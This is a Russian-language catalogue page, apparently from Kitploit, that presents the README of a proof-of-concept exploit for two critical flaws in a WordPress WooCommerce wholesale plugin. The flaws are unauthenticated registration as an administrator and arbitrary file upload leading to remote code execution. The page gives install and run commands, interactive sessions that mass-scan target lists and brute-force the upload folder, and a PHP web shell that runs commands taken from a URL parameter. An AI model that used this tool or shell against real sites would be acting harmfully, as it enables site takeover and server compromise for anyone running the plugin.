Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27542-CVE-2026-27540- — Неаутентифицированное повышение привилегий | Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

Неаутентифицированное повышение привилегий | Неаутентифицированная произвольная загрузка файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2115 месяцев назадЕщё не проверено

Печатающий SVG


🔴 Обзор уязвимостей

CVE-2026-27542 — Неаутентифицированное повышение привилегий

ПолеДетали
CVE IDCVE-2026-27542
СерьёзностьCRITICAL — оценка CVSS v3.1: 9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Затронутый компонентПлагин WooCommerce Wholesale Lead Capture (WWLC) для WordPress
Тип уязвимостиНеаутентифицированное повышение привилегий
Требуется аутентификацияНет
CWECWE-269: Некорректное управление привилегиями

Описание:
Плагин WooCommerce Wholesale Lead Capture для WordPress уязвим к неаутентифицированному повышению привилегий во всех известных затронутых версиях. Уязвимость находится в обработчике AJAX-действия wwlc_create_user, который обрабатывает запросы на регистрацию пользователей без надлежащей санитизации или проверки полей ролей, предоставленных пользователем. Удалённый неаутентифицированный злоумышленник может сформировать специально созданный POST-запрос, который внедряет произвольные поля возможностей WordPress — включая wp_capabilities[administrator] — непосредственно в метаданные пользователя в момент создания учётной записи. Это позволяет злоумышленнику самостоятельно зарегистрироваться в качестве администратора WordPress без какой-либо предварительной аутентификации или взаимодействия с легитимным пользователем, что приводит к полной компрометации затронутой установки WordPress.


CVE-2026-27540 — Неаутентифицированная произвольная загрузка файлов

ПолеДетали
CVE IDCVE-2026-27540
СерьёзностьCRITICAL — оценка CVSS v3.1: 9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Затронутый компонентПлагин WooCommerce Wholesale Lead Capture (WWLC) для WordPress
Тип уязвимостиНеаутентифицированная произвольная загрузка файлов (приводящая к удалённому выполнению кода)
Требуется аутентификацияНет
CWECWE-434: Неограниченная загрузка файла опасного типа

Описание:
Плагин WooCommerce Wholesale Lead Capture для WordPress уязвим к неаутентифицированной произвольной загрузке файлов во всех известных затронутых версиях. Уязвимость находится в AJAX-действии wwlc_file_upload_handler, которое зарегистрировано без каких-либо требований аутентификации или проверки nonce. Отправляя специально сформированный multipart POST-запрос на /wp-admin/admin-ajax.php, удалённый неаутентифицированный злоумышленник может загружать файлы произвольного типа — включая PHP-веб-шеллы — в каталог сервера wp-content/uploads/ в динамически создаваемый подкаталог wwlc-temp-*. Успешная эксплуатация приводит к удалённому выполнению кода (RCE) на веб-сервере от имени учётной записи пользователя веб-процесса.


🛠️ Описание инструмента

Это эксплойт Proof-of-Concept (PoC) для двух описанных выше критических уязвимостей, нацеленный на установки WordPress, на которых работает плагин WooCommerce Wholesale Lead Capture. Инструмент поддерживает два независимых режима атаки:

РежимТип атакиЦель
Режим 1Неаутентифицированная произвольная загрузка файлов + подбор каталога переборомЗагрузить PHP-веб-шелл и найти его с помощью многоуровневого подбора каталога
Режим 2Неаутентифицированное повышение привилегий через регистрациюСамостоятельно зарегистрироваться как администратор WordPress и подтвердить доступ администратора

📋 Требования

Системные требования

  • Python 3.8 или выше
  • Доступ в интернет к целевым системам
  • Linux / Windows / macOS

Зависимости Python

pip install requests urllib3 colorama

Или установка через файл requirements:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Установка

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ Использование

Базовый запуск

python3 CVE-2026-27542_CVE-2026-27540.py

Инструмент предоставляет интерактивный терминальный интерфейс. У вас будут запрошены все необходимые параметры.


🗂️ Формат списка целей

Создайте обычный текстовый файл (например, list.txt) с одним целевым URL в каждой строке:

https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 Режим 1 — Загрузка файлов + подбор каталога перебором

Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

Пример файла шелла (shell.php):

<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

Примечание: Каталог wwlc-temp-* динамически генерируется плагином с помощью PHP-функции uniqid('wwlc-temp-'). Инструмент использует многоуровневую стратегию перебора для его обнаружения:

УровеньСтратегияОписание
0Листинг каталогаПытается получить список каталога загрузок, если он открыт
1На основе шаблоновПодбор на основе времени и последовательных числовых значений
2Hex на основе времениОснован на наблюдаемых временных метках HTTP-запросов
3Случайный HexПодбор чисто случайных hex-строк

🟠 Режим 2 — Регистрация + внедрение роли + проверка прав администратора

Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

Инструмент:

  1. Обнаруживает форму регистрации WWLC и извлекает действительный nonce
  2. Отправляет специально сформированный payload регистрации, внедряющий роль administrator
  3. Пытается выполнить вход с созданными учётными данными
  4. Проверяет доступ к панели администратора через несколько admin-эндпоинтов WP
  5. Сохраняет подтверждённые успешные входы администратора в выходной файл

📁 Выходные файлы

Скачать инструмент